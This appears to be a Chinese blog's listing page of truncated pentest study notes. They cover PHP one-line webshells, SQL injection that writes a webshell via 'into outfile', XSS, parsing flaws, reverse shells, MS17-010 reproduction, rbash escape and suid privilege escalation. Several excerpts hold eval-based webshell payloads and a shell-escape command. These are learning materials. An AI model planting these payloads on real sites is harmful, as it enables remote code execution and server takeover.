原创 常用的php一句話木馬格式

測試語句 <?php phpinfo();?> 最初語句 <?php @eval($_POST[cmd]);?> <?php @eval($_REQUEST[cmd]);?> 前端的傳輸方式: GET 數據從url提交 POS

原创 DC1靶機

目標探測 因爲是在局域網內,所以使用內網掃描 目標已經確定,進行端口掃描 namp -sT -sC -p- -sV -T 3 -sT 全連接 -sC 使用默認的安全腳本 -p- 全端口 -sV 版本探測 -T 時間頻率(太快

原创 文件包含-僞協議

文件包含漏洞利用的前提 1.web 應用採用 include 等文件包含函數,並且需要包含的文件路徑是通過用戶傳輸參數的方式引入; 2.用戶能夠控制包含文件的參數,被包含的文件可被當前頁面訪問; 在使用文件包含漏洞時,必須要能知

原创 SQL注入小總結

原理 在程序開發時,開發人員沒有對可以進行數據庫交互的地方進行嚴格過濾。導致用戶在提交數據時,可以將構造的惡意sql語句提交到數據庫進行執行。 個人總結:sql注入就是惡意sql語句在數據庫被執行 攻擊方式(分類、步驟、工具)

原创 HTTP狀態碼的意義

使用ASP.NET/PHP/JSP 或者javascript都會用到http的不同狀態,一些常見的狀態碼爲: 200 – 服務器成功返回網頁 404 – 請求的網頁不存在 503 – 服務不可用 1xx(臨時響應) 表示臨時響應並

原创 常見解析漏洞

IIS6.0-文件解析漏洞 IIS6.0-目錄解析漏洞 IIS7.0-畸形解析漏洞 apache-%0a解析漏洞 apache-未知後綴名解析漏洞 nginx-訪問文件解析漏洞 nginx-畸形解析漏洞 nginx-截斷解析漏洞

原创 各業務功能的測試點

0×1登錄功能 2 0×2找回密碼功能 3 0×3註冊功能 4 0×4支付功能 4 0×5賬戶功能 5 0×6個人中心 5 0×7 評論功能 6 0×8 上傳功能 7 0×9 訂單功能 7 0×10 收穫地址功能 7 0×1登

原创 爲什麼大多使用反向shell

反向shell和正向shell的區別 正向shell:控制端主動發起連接去連接被控制端。 反向shell:被控制端主動連接控制端。 在滲透環境中,通常由於被控端因防火牆受限、權限不足、端口被佔用等情形。會導致通常進入被控制端的數據

原创 mysql寫入一句話的方式

一、union select 後寫入 最常見的寫入方式,union select 後跟 into outfile 語句 1’ union select 1,2,’<?php @eval($_POST[cmd]);?>’ into

原创 XSS小總結

原理 開發者在開發時,對客戶端過濾嚴格,導致惡意的javascript代碼在瀏覽器上執行 跨站腳本攻擊是指惡意攻擊者往Web頁面裏插入惡意Script代碼,當用戶瀏覽該頁之時,嵌入其中Web裏面的Script代碼會被執行,從而達到

原创 ms17-010永恆之藍復現

進入msf,搜索ms17-010模塊 查看參數 設置攻擊目標 設置攻擊模塊 設置攻擊目標 設置攻擊載荷(用於tcp的的反彈shell) 返回shell的IP 開始攻擊

原创 MYSQL寫入一句話的方式

一、union select 後寫入 最常見的寫入方式,union select 後跟 into outfile 語句 1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into

原创 Linux突破受限shell使用sudo提權

使用ssh登錄 restricted 受限的 受限的shell命令,rbash,百度搜索rbash,發現有繞過方法,進行查找,並嘗試 Vi編輯,輸入,到了/bin/bash BASH_CMDS[a]=/bin/sh;a /bin

原创 Linux配置不當提權-suid提權

攻擊成功,並得到一個shell,但是這裏卻只是一個簡單的shell,首先需要把它轉換爲一個交互式的shell 在簡單shell中直接按刪除鍵是不行的,要按住ctrl鍵之後,再按住刪除鍵纔可以,其他鍵的使用也一樣 命令 python

原创 wpscan更新失敗

wpscan --update 在線更新 更新失敗 那就將包下載到本地更新 wget http://blog.dsb.ink/wpscan/wp.zip unzip wp.zip 將剛剛wpscan的解壓文件 放到ap